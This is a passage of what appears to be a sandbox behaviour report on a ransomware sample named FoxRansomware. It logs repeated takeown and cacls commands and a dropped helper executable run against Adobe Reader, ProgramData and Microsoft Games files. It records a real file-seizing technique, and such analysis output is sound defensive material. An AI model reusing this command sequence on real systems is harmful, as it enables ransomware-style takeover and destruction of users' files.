    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C
    3⤵
    PID:4908
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"
    3⤵
    PID:4836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4348
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner
      4⤵
      Executes dropped EXE
      PID:4804
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4684
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""
  2⤵
  - Loads dropped DLL
  PID:4720
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C
    3⤵
    PID:4732
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"
    3⤵
    PID:4816
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "MyriadPro-Regular.otf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4500
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "MyriadPro-Regular.otf" -nobanner
      4⤵
      Executes dropped EXE
      PID:4504
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4472
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""
  2⤵
  - Loads dropped DLL
  PID:4956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C
    3⤵
    PID:3532
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"
    3⤵
    PID:4984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4992
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner
      4⤵
      Executes dropped EXE
      PID:4996
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5016
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths""
  2⤵
  - Loads dropped DLL
  PID:5048
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths" /E /G Admin:F /C
    3⤵
    PID:5028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths"
    3⤵
    - Modifies file permissions
    PID:4588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "can03.ths" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4576
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "can03.ths" -nobanner
      4⤵
      Executes dropped EXE
      PID:5064
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5100
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""
  2⤵
  - Loads dropped DLL
  PID:4952
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C
    3⤵
    PID:5112
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"
    3⤵
    PID:3412
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3548
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner
      4⤵
      Executes dropped EXE
      PID:2876
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3352
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT""
  2⤵
  - Loads dropped DLL
  PID:1436
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C
    3⤵
    PID:3792
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"
    3⤵
    - Modifies file permissions
    PID:4948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "ROMAN.TXT" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3816
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "ROMAN.TXT" -nobanner
      4⤵
      Executes dropped EXE
      PID:3880
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3872
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT""
  2⤵
  - Loads dropped DLL
  PID:3864
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" /E /G Admin:F /C
    3⤵
    PID:3848
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT"
    3⤵
    - Modifies file permissions
    PID:3596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "CP1257.TXT" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3844
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "CP1257.TXT" -nobanner
      4⤵
      Executes dropped EXE
      PID:4856
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4900
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  2⤵
  - Loads dropped DLL
  PID:3972
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
    3⤵
    PID:1780
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1396
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "superbar.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3444
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "superbar.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:2752
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3748
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""
  2⤵
  - Loads dropped DLL
  PID:1604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C
    3⤵
    PID:2156
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2180
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1784
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:2060
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3004
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files\Microsoft Games\Chess\ChessMCE.png""
  2⤵
  - Loads dropped DLL
  PID:2348
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Chess\ChessMCE.png" /E /G Admin:F /C
    3⤵
    PID:3388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Chess\ChessMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "ChessMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1860
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "ChessMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:1528
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1568
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""
  2⤵
  - Loads dropped DLL
  PID:2064
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C
    3⤵
    PID:2532
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"
    3⤵
    PID:3520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "AGMGPUOptIn.ini" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2416
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "AGMGPUOptIn.ini" -nobanner
      4⤵
      Executes dropped EXE
      PID:2980
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2584
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""
  2⤵
  - Loads dropped DLL
  PID:3516
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C
    3⤵
    PID:628
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"
    3⤵
    - Modifies file permissions
    PID:1968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "MyriadCAD.otf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2588
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "MyriadCAD.otf" -nobanner
      4⤵
      Executes dropped EXE
      PID:2556
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2784
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""
  2⤵
  - Loads dropped DLL
  PID:2800
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C
    3⤵
    PID:2740
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"
    3⤵
    PID:3104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "create_form.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3272
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "create_form.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:964
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2716
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""
  2⤵
  - Loads dropped DLL
  PID:1956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C
    3⤵
    PID:988
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"
    3⤵
    PID:2708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "info.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2220
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "info.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1196
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1908
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""
  2⤵
  - Loads dropped DLL
  PID:2624
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C
    3⤵
    PID:3732
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"
    3⤵
    - Modifies file permissions
    PID:3908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "review_same_reviewers.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2644
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "review_same_reviewers.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:3608
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3944
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""
  2⤵
  - Loads dropped DLL
  PID:2976
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C
    3⤵
    PID:476
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"
    3⤵
    PID:1292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "trash.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2296
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "trash.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:3636
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2568
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""
  2⤵
  - Loads dropped DLL
  PID:2620
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:3740
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"
    3⤵
    - Modifies file permissions
    PID:1836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "CourierStd-Bold.otf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2460
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "CourierStd-Bold.otf" -nobanner
      4⤵
      Executes dropped EXE
      PID:2992
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1508
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf""
  2⤵
  - Loads dropped DLL
  PID:2868
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C
    3⤵
    PID:2720
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"
    3⤵
    - Modifies file permissions
    PID:2500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "MyriadPro-It.otf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3752
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "MyriadPro-It.otf" -nobanner
      4⤵
      Executes dropped EXE
      PID:2032
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:664
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""
  2⤵
  PID:1464
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C
    3⤵
    PID:2656
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"
    3⤵
    PID:2112
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner
    3⤵
    PID:1300
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner
      4⤵
      Executes dropped EXE
      PID:2200
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2428
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""
  2⤵
  PID:1140
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C
    3⤵
    PID:3556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"
    3⤵
    - Modifies file permissions
    PID:1588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "can.hyp" -nobanner
    3⤵
    PID:3708
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "can.hyp" -nobanner
      4⤵
      PID:1560
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3112
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""
  2⤵
  PID:3204
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C
    3⤵
    PID:2504
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"
    3⤵
    - Modifies file permissions
    PID:3184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "usa37.hyp" -nobanner
    3⤵
    PID:1564
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "usa37.hyp" -nobanner
      4⤵
      PID:272
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3224
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""
  2⤵
  PID:3324
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C
    3⤵
    PID:3236
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"
    3⤵
    PID:2744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "ICELAND.TXT" -nobanner
    3⤵
    PID:2160
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "ICELAND.TXT" -nobanner
      4⤵
      PID:816
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3164
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""
  2⤵
  PID:3452
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C
    3⤵
    PID:1692
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"
    3⤵
    PID:3256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "CP1254.TXT" -nobanner
    3⤵
    PID:3464
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "CP1254.TXT" -nobanner
      4⤵
      PID:1676
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1596
- C:\Windows\SysWOW64\cmd.exe
